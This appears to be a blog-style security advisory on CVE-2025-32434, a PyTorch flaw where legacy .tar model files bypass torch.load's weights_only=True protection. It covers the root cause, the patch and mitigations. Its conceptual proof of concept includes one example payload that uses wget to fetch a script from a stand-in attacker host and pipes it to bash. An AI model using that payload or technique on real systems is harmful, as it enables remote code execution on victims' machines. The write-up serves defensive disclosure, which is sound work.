CVE-2025-32434: PyTorch's 'Safe Mode' torch.load Wasn't So Safe After All
Hey folks, gather round the virtual fireplace. Today, we're diving into a fascinating vulnerability in one of the most popular machine learning frameworks out there: PyTorch. CVE-2025-32434 is a bit of a sneaky one, turning a feature designed for safety into a potential gateway for Remote Code Execution (RCE). Grab your coffee (or your preferred caffeinated beverage), and let's unpack this.
TL;DR / Executive Summary
What's the issue? CVE-2025-32434 is a Remote Code Execution (RCE) vulnerability in PyTorch versions up to and including 2.5.1.
How does it work? Even when using the supposedly "safe" torch.load(..., weights_only=True)
function, specially crafted malicious model files using a legacy format can bypass security checks and execute arbitrary code.
Affected Systems: PyTorch <= 2.5.1.
Severity: Likely High to Critical (CVSS score pending, but RCE is generally serious business).
Mitigation: Upgrade PyTorch to version 2.6.0 or later immediately (pip install --upgrade torch>=2.6.0
).
Introduction: Trust in the Machine (Learning Model)
In the rapidly expanding universe of Artificial Intelligence and Machine Learning, frameworks like PyTorch are the bedrock upon which incredible innovations are built. Developers and data scientists rely on these tools daily, often loading pre-trained models downloaded from various sources. But what happens when the mechanism designed to safely load these models has a hidden flaw?
Enter torch.load
. Historically, loading arbitrary files with torch.load
(which uses Python's pickle
module under the hood) was known to be risky. Pickle files can contain code that gets executed upon loading, making it a classic RCE vector if you load a file from an untrusted source. To combat this, PyTorch introduced the weights_only=True
argument. The promise was simple: set this flag, and torch.load
would only load the model's parameters (tensors and simple data types), refusing to execute any potentially harmful code embedded within. It was the recommended "safe mode."
Except, as security researcher Ji'an Zhou discovered, there was a loophole. CVE-2025-32434 demonstrates that even with weights_only=True
, RCE is still possible under certain conditions. This matters immensely because many developers, following best practices, likely switched to weights_only=True
believing they were protected.
Technical Deep Dive: Unraveling the Legacy Knot
So, how did this happen? Let's get technical.
The pickle
Problem and weights_only
:
Python's pickle
module is powerful but dangerous for deserializing untrusted data. It allows objects to define a __reduce__
method, which can specify arbitrary functions to be called during unpickling – including things like os.system
. torch.save
uses pickle
by default.
The weights_only=True
flag in torch.load
was designed to mitigate this by using a restricted unpickler (_weights_only_unpickler
). This unpickler maintains a strict allowlist of types it's permitted to deserialize, primarily focusing on tensors, storages, and basic Python collections needed for model weights and structure. Anything else, especially code execution attempts via __reduce__
, should be blocked.
The Root Cause - Legacy Format Bypass:
The vulnerability lies in how PyTorch handles older model file formats, specifically the legacy .tar
format. The code path responsible for loading these older formats (_legacy_load
in torch/serialization.py
) didn't correctly or consistently enforce the weights_only=True
restriction.
Think of it like this: weights_only=True
is a strict security guard posted at the main entrance (the modern zip-based format loader). This guard meticulously checks everyone's ID (the type of data being unpickled). However, CVE-2025-32434 revealed an old, rarely used service tunnel (the legacy .tar
format loader) where the security guard wasn't properly stationed or whose instructions were incomplete. An attacker could craft a package looking like a normal delivery but direct it through this service tunnel, bypassing the main security check and smuggling contraband (malicious code) inside.
Specifically, when torch.load
encountered a file identified as the legacy .tar
format, it proceeded down a code path where the _weights_only_unpickler
wasn't correctly applied or its restrictions were circumvented, allowing the underlying (unsafe) pickle.load
to potentially execute code embedded within the archive's components.
Attack Vector & Business Impact:
An attacker crafts a malicious .pt
file saved using the vulnerable legacy .tar
format. This file contains pickled objects designed to execute code upon deserialization (e.g., using __reduce__
to call os.system
). The attacker then tricks a victim (a developer, an automated ML pipeline) into loading this file using torch.load(malicious_file, weights_only=True)
.
- Attack Scenario: A user downloads a pre-trained model from a less-than-reputable source or a compromised repository. They load it using the "safe"
weights_only=True
flag, inadvertently triggering RCE. - Impact: Full RCE on the machine running the PyTorch code. This could mean:
- Data theft (sensitive datasets, proprietary models, credentials).
- Server compromise and lateral movement within a network.
- Model poisoning or manipulation.
- Denial of Service.
Proof of Concept (Conceptual)
For ethical reasons, we won't provide a ready-to-run exploit. However, here’s the conceptual flow of how an attacker might craft a malicious file and how a victim would trigger it:
-
Attacker Creates Malicious File:
- The attacker creates a Python object whose
__reduce__
method returns a function likeos.system
and arguments (e.g.,('wget http://attacker.com/payload.sh -O /tmp/p.sh && bash /tmp/p.sh',)
). - This object is pickled.
- The pickled data is embedded within a file structure conforming to PyTorch's legacy
.tar
format. This might involve creating specific files within a tarball that_legacy_load
expects. - The final file is saved with a
.pt
extension (or similar) to appear like a standard PyTorch model file. Let's call itmalicious_legacy_model.pt
.
- The attacker creates a Python object whose
-
Victim Loads the File:
A developer or automated system runs the following Python code, believing it to be safe due toweights_only=True
:# victim_code.py import torch import os # Only needed for the example payload, not by the victim code itself trusted_source = False # Let's assume the source is untrusted if not trusted_source: print(f"Loading model with weights_only=True for safety...") try: # Attempting to load the malicious file using the 'safe' flag # This is where CVE-2025-32434 is triggered model_data = torch.load("malicious_legacy_model.pt", weights_only=True) print("Model loaded successfully? If you see this, the RCE might have failed or executed silently.") # Further processing of model_data... except Exception as e: # The RCE might occur *during* the load, potentially before or during exception handling print(f"An error occurred: {e}") print("However, code execution might have already happened!") else: # Potentially unsafe load if source was trusted (unrelated to this CVE) # model_data = torch.load("some_model.pt", weights_only=False) pass
Mitigation and Remediation: Patch Up!
Fortunately, the fix is straightforward:
-
Immediate Fix: Upgrade PyTorch to version 2.6.0 or later.
pip install --upgrade torch>=2.6.0 # Or using conda: # conda update pytorch # (Ensure channel configuration points to versions >= 2.6.0)
This version contains the patch that closes the loophole.
-
Patch Analysis (Commit
8d4b8a920a...
):
The core fix, visible intorch/serialization.py
within the_legacy_load
function, is beautifully simple. Before attempting to process the contents of the detected tar file, a new check was added:# Inside _legacy_load, after opening the tarfile: if pickle_module is _weights_only_unpickler: raise RuntimeError( "Cannot use ``weights_only=True`` with files saved in the " "legacy .tar format. " + UNSAFE_MESSAGE )
- What it does: It explicitly checks if the unpickler being used is the restricted
_weights_only_unpickler
(which happens whenweights_only=True
is passed totorch.load
). - Why it works: If someone tries to load a legacy
.tar
format file and they've specifiedweights_only=True
, this code now throws aRuntimeError
immediately, preventing the execution from reaching the potentially unsafepickle.load
calls further down the legacy path with the restricted unpickler incorrectly applied or bypassed. It effectively slams the door on that old service tunnel when the "high security" mode is active. The added test case intest/test_serialization.py
confirms this behavior.
- What it does: It explicitly checks if the unpickler being used is the restricted
-
Long-Term Solutions & Best Practices:
- Verify Model Sources: Only load models from trusted, verified sources. Implement checksum verification if possible.
- Input Scanning: If feasible, use tools to scan model files for suspicious patterns before loading (though this is complex).
- Principle of Least Privilege: Run ML training/inference processes in sandboxed environments (containers, VMs) with minimal permissions.
- Dependency Management: Keep your ML frameworks and libraries up-to-date. Use tools like
pip-audit
or GitHub Dependabot.
-
Verification: Check your installed PyTorch version:
python -c "import torch; print(torch.__version__)"
Ensure the output is
2.6.0
or higher.
Timeline
- Discovery: Credited to Ji'an Zhou, likely occurred sometime before April 2025.
- Vendor Notification: Assumed to be shortly after discovery.
- Patch Development & Commit: The relevant fix (
8d4b8a9...
) was merged leading up to the 2.6.0 release. - Patch Availability: PyTorch version 2.6.0 released, containing the fix.
- Public Disclosure (GHSA-53q9-r3pm-6pq6): April 17-18, 2025.
Lessons Learned: No Silver Bullets
This CVE serves as a great reminder of several key security principles:
- Security Features Aren't Magic: Flags like
weights_only=True
are powerful tools, but they are implemented in code, which can have bugs or unforeseen interactions, especially with legacy components. Understand how a security feature works, not just that it exists. - Legacy Code is a Risk: Old code paths and formats, even if rarely used, can harbor vulnerabilities. Thorough auditing or planned deprecation is essential.
- Trust but Verify (Especially Downloads): The ML world thrives on sharing models, but this introduces supply chain risks. Treat downloaded model files with the same caution you would treat executable code.
Key Takeaway: Security is a continuous process, not a one-time checkbox. Even seemingly "safe" operations need scrutiny, especially when dealing with complex frameworks and external data.
References and Further Reading
- GitHub Advisory (GHSA-53q9-r3pm-6pq6): https://github.com/advisories/GHSA-53q9-r3pm-6pq6
- PyTorch Security Documentation: https://github.com/pytorch/pytorch/security
- PyTorch
torch.load
Documentation: https://pytorch.org/docs/stable/generated/torch.load.html - Relevant Patch Commit: https://github.com/pytorch/pytorch/commit/8d4b8a920a2172523deb95bf20e8e52d50649c04
Stay safe out there, keep your dependencies updated, and question your assumptions! What other "safe" mechanisms might have hidden edge cases? Food for thought. Until next time, happy (and secure) coding!